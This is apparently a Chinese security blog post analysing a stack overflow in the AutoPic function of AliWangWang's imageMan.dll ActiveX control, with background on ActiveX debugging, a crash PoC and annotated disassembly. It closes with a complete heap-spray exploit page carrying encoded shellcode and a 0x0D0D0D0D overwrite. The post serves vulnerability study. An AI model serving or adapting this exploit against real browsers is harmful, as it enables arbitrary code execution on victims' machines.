<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/df32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/df16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"dreamfo1l.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="漏洞描述淘宝阿里旺旺的ActiveX控件imageMan.dll中的AutoPic函数由于未对参数长度进行有效检验，导致栈溢出漏洞，利用漏洞可执行任意代码。">
<meta property="og:type" content="article">
<meta property="og:title" content="阿里旺旺ActiveX控件imageMan.dll栈溢出漏洞">
<meta property="og:url" content="https://dreamfo1l.github.io/2021/05/26/%E9%98%BF%E9%87%8C%E6%97%BA%E6%97%BAActiveX/index.html">
<meta property="og:site_name" content="dreamfoil">
<meta property="og:description" content="漏洞描述淘宝阿里旺旺的ActiveX控件imageMan.dll中的AutoPic函数由于未对参数长度进行有效检验，导致栈溢出漏洞，利用漏洞可执行任意代码。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://tva4.sinaimg.cn/large/0069MqrZly1gqvtsfsyfsj30zb0il0vo.jpg">
<meta property="article:published_time" content="2021-05-26T06:25:25.000Z">
<meta property="article:modified_time" content="2021-05-26T06:49:07.368Z">
<meta property="article:author" content="dreamfoil">
<meta property="article:tag" content="漏洞分析">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://tva4.sinaimg.cn/large/0069MqrZly1gqvtsfsyfsj30zb0il0vo.jpg">

<link rel="canonical" href="https://dreamfo1l.github.io/2021/05/26/%E9%98%BF%E9%87%8C%E6%97%BA%E6%97%BAActiveX/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>阿里旺旺ActiveX控件imageMan.dll栈溢出漏洞 | dreamfoil</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">dreamfoil</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://dreamfo1l.github.io/2021/05/26/%E9%98%BF%E9%87%8C%E6%97%BA%E6%97%BAActiveX/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="dreamfoil">
      <meta itemprop="description" content="独立之精神，自由之思想。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dreamfoil">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          阿里旺旺ActiveX控件imageMan.dll栈溢出漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-05-26 14:25:25 / 修改时间：14:49:07" itemprop="dateCreated datePublished" datetime="2021-05-26T14:25:25+08:00">2021-05-26</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h5 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h5><p>淘宝阿里旺旺的ActiveX控件imageMan.dll中的AutoPic函数由于未对参数长度进行有效检验，导致栈溢出漏洞，利用漏洞可执行任意代码。</p>
<span id="more"></span>

<h3 id="0x00-ActiveX基础知识"><a href="#0x00-ActiveX基础知识" class="headerlink" title="0x00 ActiveX基础知识"></a>0x00 ActiveX基础知识</h3><h4 id="1-什么是ActiveX"><a href="#1-什么是ActiveX" class="headerlink" title="1.什么是ActiveX"></a>1.什么是ActiveX</h4><p>–简单来说，就是<strong>浏览器插件</strong>，它是一些软件组件或对象，可以将其插入到WEB网页或者其他应用程序中。一般软件需要用户单独下载然后执行安装，ActiveX插件是当用户浏览到特定网页时，ID浏览器自动下载并提示用户安装。<br>正是由了插件，浏览器才能够用于阅读文档，观看电影，购物等。<br>Win10以后不再支持ActiveX<br>–是<strong>一种组件对象模型（COM）</strong>，核心技术是COM，独立于语言开发，既然使用COM，那么就会在注册表中注册CLSID</p>
<h4 id="2-ActiveX逆向分析基础"><a href="#2-ActiveX逆向分析基础" class="headerlink" title="2.ActiveX逆向分析基础"></a>2.ActiveX逆向分析基础</h4><h5 id="classid"><a href="#classid" class="headerlink" title="classid"></a>classid</h5><p>每个ActiveX组件中可能包含多个class类，每个class类可能包含了多个接口，每个接口可能包含了多个函数。每个class类有一个自己的classid。在调用ActiveX中的某个函数的时候，会事先通过classid来引入class。<br>注册表 HKEY_CLASSES_ROOT\CLSID中记录的就是classid。每个 classid下面有个typelib，typelib记录的是所属com组件的id。组件id记录在注册表的HKEY_CLASSES_ROOT\TypeLib目录下。</p>
<h5 id="分发函数"><a href="#分发函数" class="headerlink" title="分发函数"></a>分发函数</h5><p>ActiveX组件中调用函数的机制叫做分发。com组件在调用某个函数时，首先使用被调用函数的函数名来调用GetIDsOfNames函数，返回值是函数编号(DISPID,又名调度ID），再使用该函数编号和函数参数来调用Invoke函数。Invoke函数内部调用DispCallFunc(OLEAUT32!DispCallFunc(HWND ActiveX_instant, dispatchID id))获取函数地址。</p>
<h5 id="分析方法"><a href="#分析方法" class="headerlink" title="分析方法"></a>分析方法</h5><p>因为调用组件中的函数，最终都会调用DispCallFunc函数所以<br>普遍的方法是利用OLEAUT32!DispCallFunc函数来对调试函数进行跟踪分析，然后跟进 call ecx</p>
<h4 id="3-ActiveX的使用"><a href="#3-ActiveX的使用" class="headerlink" title="3.ActiveX的使用"></a>3.ActiveX的使用</h4><p>在html中直接创建对象，就可以直接使用了<br>AutoPic是类里的一个函数，下图Poc中target就是创建的一个对象。</p>
<h3 id="0x01-针对ActiveX控件的漏洞分析方法"><a href="#0x01-针对ActiveX控件的漏洞分析方法" class="headerlink" title="0x01 针对ActiveX控件的漏洞分析方法"></a>0x01 针对ActiveX控件的漏洞分析方法</h3><p><strong>Poc代码</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">object</span> <span class="attr">classid</span>=<span class="string">&quot;clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF&quot;</span> <span class="attr">id</span>=<span class="string">&quot;target&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">object</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"></span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="keyword">var</span> buffer = <span class="string">&#x27;&#x27;</span>;</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="keyword">while</span> (buffer.length &lt; <span class="number">1111</span>) buffer+=<span class="string">&quot;A&quot;</span>;</span></span></span><br><span class="line"><span class="javascript"><span class="xml">target.AutoPic(buffer,<span class="string">&quot;defaultV&quot;</span>);</span></span></span><br><span class="line"><span class="javascript"><span class="xml"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span></span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>classid是com组件在注册表的唯一标识，从注册表可以找到</p>
<h5 id="关于ActiveX控件中的函数调试跟进，可使用以下方法"><a href="#关于ActiveX控件中的函数调试跟进，可使用以下方法" class="headerlink" title="关于ActiveX控件中的函数调试跟进，可使用以下方法"></a>关于ActiveX控件中的函数调试跟进，可使用以下方法</h5><ol>
<li>调试器attach IE程序，ALT + E ，找到可执行模块 OLEAUT32，双击进入</li>
<li>Ctrl+N ，找到函数名 DispCallFunc,双击进入</li>
<li>找到该函数首个 call ecx ，在此下断，动态调试，F7进入函数，即是漏洞函数。 </li>
</ol>
<p>这里调试Poc<br><img src="http://tva4.sinaimg.cn/large/0069MqrZly1gqvtsfsyfsj30zb0il0vo.jpg" alt="1"><br>成功断下并能看到传递的超长字符串</p>
<p>F7跟进，这里应该就是 AutoPic函数</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">1001AB7F    <span class="number">55</span>              <span class="keyword">push</span> <span class="built_in">ebp</span></span><br><span class="line">1001AB80    8BEC            <span class="keyword">mov</span> <span class="built_in">ebp</span>,<span class="built_in">esp</span></span><br><span class="line">1001AB82    81EC 1C030000   <span class="keyword">sub</span> <span class="built_in">esp</span>,<span class="number">0x31C</span></span><br><span class="line">1001AB88    <span class="number">57</span>              <span class="keyword">push</span> <span class="built_in">edi</span></span><br><span class="line">1001AB89    C685 F8FDFFFF <span class="number">0</span>&gt;<span class="keyword">mov</span> <span class="built_in">byte</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x208</span>],<span class="number">0x0</span></span><br><span class="line">1001AB90    B9 <span class="number">40000000</span>     <span class="keyword">mov</span> <span class="built_in">ecx</span>,<span class="number">0x40</span></span><br><span class="line">1001AB95    33C0            <span class="keyword">xor</span> <span class="built_in">eax</span>,<span class="built_in">eax</span></span><br><span class="line">1001AB97    8DBD F9FDFFFF   <span class="keyword">lea</span> <span class="built_in">edi</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x207</span>]</span><br><span class="line">1001AB9D    F3:AB           <span class="keyword">rep</span> stos <span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001AB9F    <span class="number">66</span>:AB           stos <span class="built_in">word</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001ABA1    AA              stos <span class="built_in">byte</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001ABA2    6A <span class="number">00</span>           <span class="keyword">push</span> <span class="number">0x0</span></span><br><span class="line">1001ABA4    6A <span class="number">00</span>           <span class="keyword">push</span> <span class="number">0x0</span></span><br><span class="line">1001ABA6    <span class="number">68</span> <span class="number">04010000</span>     <span class="keyword">push</span> <span class="number">0x104</span></span><br><span class="line">1001ABAB    8D85 F8FDFFFF   <span class="keyword">lea</span> <span class="built_in">eax</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x208</span>]</span><br><span class="line">1001ABB1    <span class="number">50</span>              <span class="keyword">push</span> <span class="built_in">eax</span></span><br><span class="line">1001ABB2    6A FF           <span class="keyword">push</span> -<span class="number">0x1</span></span><br><span class="line">1001ABB4    8B4D 0C         <span class="keyword">mov</span> <span class="built_in">ecx</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>+<span class="number">0xC</span>]      ；超长字符串参数buffer</span><br><span class="line">1001ABB7    <span class="number">51</span>              <span class="keyword">push</span> <span class="built_in">ecx</span>                               </span><br><span class="line">1001ABB8    6A <span class="number">00</span>           <span class="keyword">push</span> <span class="number">0x0</span></span><br><span class="line">1001ABBA    6A <span class="number">00</span>           <span class="keyword">push</span> <span class="number">0x0</span></span><br><span class="line">1001ABBC    FF15 A8E20310   <span class="keyword">call</span> <span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ds</span>:[&lt;&amp;KERNEL32<span class="number">.</span>WideCharTo&gt;<span class="comment">; kernel32.WideCharToMultiByte</span></span><br><span class="line">1001ABC2    C685 F0FCFFFF <span class="number">0</span>&gt;<span class="keyword">mov</span> <span class="built_in">byte</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x310</span>],<span class="number">0x0</span></span><br><span class="line">1001ABC9    B9 <span class="number">40000000</span>     <span class="keyword">mov</span> <span class="built_in">ecx</span>,<span class="number">0x40</span></span><br><span class="line">1001ABCE    33C0            <span class="keyword">xor</span> <span class="built_in">eax</span>,<span class="built_in">eax</span></span><br><span class="line">1001ABD0    8DBD F1FCFFFF   <span class="keyword">lea</span> <span class="built_in">edi</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x30F</span>]</span><br><span class="line">1001ABD6    F3:AB           <span class="keyword">rep</span> stos <span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001ABD8    <span class="number">66</span>:AB           stos <span class="built_in">word</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001ABDA    AA              stos <span class="built_in">byte</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001ABDB    6A 5C           <span class="keyword">push</span> <span class="number">0x5C</span>														<span class="comment">;反斜杠\</span></span><br><span class="line">1001ABDD    8D95 F8FDFFFF   <span class="keyword">lea</span> <span class="built_in">edx</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x208</span>]		</span><br><span class="line">1001ABE3    <span class="number">52</span>              <span class="keyword">push</span> <span class="built_in">edx</span>										<span class="comment">;buffer转换为多字节字符串fullpath</span></span><br><span class="line">1001ABE4    E8 <span class="number">17940100</span>     <span class="keyword">call</span> ImageMan<span class="number">.10034000</span>			</span><br><span class="line">				<span class="comment">;获取字符串中最后一个反斜杠的位置index，由于无反斜杠，因此index等于字符串结束地址</span></span><br><span class="line">1001ABE9    83C4 <span class="number">08</span>         <span class="keyword">add</span> <span class="built_in">esp</span>,<span class="number">0x8</span>													</span><br><span class="line">1001ABEC    <span class="number">8985</span> F4FDFFFF   <span class="keyword">mov</span> <span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x20C</span>],<span class="built_in">eax</span></span><br><span class="line">1001ABF2    C685 FCFEFFFF <span class="number">0</span>&gt;<span class="keyword">mov</span> <span class="built_in">byte</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x104</span>],<span class="number">0x0</span></span><br><span class="line">1001ABF9    B9 <span class="number">40000000</span>     <span class="keyword">mov</span> <span class="built_in">ecx</span>,<span class="number">0x40</span></span><br><span class="line">1001ABFE    33C0            <span class="keyword">xor</span> <span class="built_in">eax</span>,<span class="built_in">eax</span></span><br><span class="line">1001AC00    8DBD FDFEFFFF   <span class="keyword">lea</span> <span class="built_in">edi</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x103</span>]</span><br><span class="line">1001AC06    F3:AB           <span class="keyword">rep</span> stos <span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001AC08    <span class="number">66</span>:AB           stos <span class="built_in">word</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001AC0A    AA              stos <span class="built_in">byte</span> <span class="built_in">ptr</span> <span class="built_in">es</span>:[<span class="built_in">edi</span>]</span><br><span class="line">1001AC0B    8B85 F4FDFFFF   <span class="keyword">mov</span> <span class="built_in">eax</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x20C</span>]	<span class="comment">;index</span></span><br><span class="line">1001AC11    8D8D F8FDFFFF   <span class="keyword">lea</span> <span class="built_in">ecx</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x208</span>]	<span class="comment">;fullpath</span></span><br><span class="line">1001AC17    2BC1            <span class="keyword">sub</span> <span class="built_in">eax</span>,<span class="built_in">ecx</span>       <span class="comment">;index=index-fullpath                       </span></span><br><span class="line">1001AC19    83C0 <span class="number">01</span>         <span class="keyword">add</span> <span class="built_in">eax</span>,<span class="number">0x1</span>				<span class="comment">;index+1</span></span><br><span class="line">1001AC1C    <span class="number">50</span>              <span class="keyword">push</span> <span class="built_in">eax</span>				<span class="comment">;size = index-fullpath + 1 </span></span><br><span class="line">																					<span class="comment">;只要无反斜杠，就会全字符串复制，最终覆盖栈顶数据</span></span><br><span class="line">1001AC1D    8D95 F8FDFFFF   <span class="keyword">lea</span> <span class="built_in">edx</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x208</span>]</span><br><span class="line">1001AC23    <span class="number">52</span>              <span class="keyword">push</span> <span class="built_in">edx</span>			<span class="comment">;源地址</span></span><br><span class="line">1001AC24    8D85 FCFEFFFF   <span class="keyword">lea</span> <span class="built_in">eax</span>,<span class="built_in">dword</span> <span class="built_in">ptr</span> <span class="built_in">ss</span>:[<span class="built_in">ebp</span>-<span class="number">0x104</span>]</span><br><span class="line">1001AC2A    <span class="number">50</span>              <span class="keyword">push</span> <span class="built_in">eax</span>			<span class="comment">;目标地址 = 本地变量</span></span><br><span class="line">1001AC2B    E8 E0160000     <span class="keyword">call</span> ImageMan<span class="number">.</span>1001C310   ；调用cpy函数</span><br><span class="line">1001AC30    83C4 0C         <span class="keyword">add</span> <span class="built_in">esp</span>,<span class="number">0xC</span></span><br></pre></td></tr></table></figure>
<p>总结： 在传递字符串参数给AutoPic函数时，它会获取反斜杠的位置，然后计算复制的size，若无反斜杠则会导致全字符串复制，最终导致溢出。</p>
<h3 id="0x02-漏洞利用"><a href="#0x02-漏洞利用" class="headerlink" title="0x02 漏洞利用"></a>0x02 漏洞利用</h3><p><strong>Exploit代码</strong><br>利用heap spray技术</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">object</span> <span class="attr">classid</span>=<span class="string">&quot;clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF&quot;</span> <span class="attr">id</span>=<span class="string">&quot;target&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">object</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"></span></span></span><br><span class="line"><span class="javascript"><span class="xml">  </span></span></span><br><span class="line"><span class="javascript"><span class="xml">shellcode = <span class="built_in">unescape</span>(</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395&#x27;</span>+</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1&#x27;</span>+</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e&#x27;</span>+</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5&#x27;</span>+</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f&#x27;</span>+</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5&#x27;</span>+</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525&#x27;</span>+</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="string">&#x27;%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e&#x27;</span>);</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="comment">//size:0xA0</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">nops=<span class="built_in">unescape</span>(<span class="string">&#x27;%u9090%u9090&#x27;</span>);  <span class="comment">//size:0x04</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">headersize =<span class="number">20</span>;        <span class="comment">//size:0x28，js中的长度是按照宽字符计算的</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">slackspace= headersize + shellcode.length;  <span class="comment">//size:0x0C8，slackspace=100</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">  </span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="keyword">while</span>(nops.length &lt; slackspace) nops+= nops;          <span class="comment">//Nop的长度是按照指数增长的，增长到0x100</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">fillblock= nops.substring(<span class="number">0</span>, slackspace);             <span class="comment">//size：0xC8，substring() 方法用于提取字符串中介于两个指定下标之间的字符</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">block= nops.substring(<span class="number">0</span>, nops.length- slackspace);        <span class="comment">//size：0x100-0xC8=0x38</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">  </span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="keyword">while</span>( block.length+ slackspace&lt;<span class="number">0x50000</span>) block= block+ block+ fillblock;</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="comment">//size:FFEAC</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">memory=<span class="keyword">new</span> <span class="built_in">Array</span>();</span></span></span><br><span class="line"><span class="javascript"><span class="xml">  </span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="keyword">for</span>( counter=<span class="number">0</span>; counter&lt;<span class="number">200</span>; counter++)</span></span></span><br><span class="line"><span class="javascript"><span class="xml">memory[counter]= block + shellcode;</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="comment">//每个元素的真实数据大小是0xFFFD8，加上额外数据，每个元素在内存中占用的大小是0x100000，一共是200个数据，假设从内存0x0的位置存放数组，200个元素，会一直存放到0xC800000，实际上数组并不是从0x0位置开始存放的，进程本身，堆栈以及其他变量所需的内存空间，会导致数组很容易覆盖0x0D0D0D0D的地址空间。</span></span></span></span><br><span class="line"><span class="javascript"><span class="xml">s=<span class="string">&#x27;&#x27;</span>;</span></span></span><br><span class="line"><span class="javascript"><span class="xml"><span class="keyword">for</span>( counter=<span class="number">0</span>; counter&lt;=<span class="number">1000</span>; counter++)</span></span></span><br><span class="line"><span class="javascript"><span class="xml">s+=<span class="built_in">unescape</span>(<span class="string">&quot;%0D%0D%0D%0D&quot;</span>);</span></span></span><br><span class="line"><span class="javascript"><span class="xml">target.AutoPic(s,<span class="string">&quot;defaultV&quot;</span>);</span></span></span><br><span class="line"><span class="javascript"><span class="xml"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span></span><br><span class="line"><span class="xml"></span></span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="tag"># 漏洞分析</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/05/26/CVE-2011-0104%20Microsoft%20Excel%20TOOLBARDEF%20Record%20stack%20overflow/" rel="prev" title="CVE-2011-0104 Microsoft Excel TOOLBARDEF Record stack overflow">
      <i class="fa fa-chevron-left"></i> CVE-2011-0104 Microsoft Excel TOOLBARDEF Record stack overflow
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/05/29/CVE-2013-0077/" rel="next" title="CVE-2013-0077 Microsoft DirectShow quartz.dll m2p文件堆溢出漏洞">
      CVE-2013-0077 Microsoft DirectShow quartz.dll m2p文件堆溢出漏洞 <i class="fa fa-chevron-right"></i>
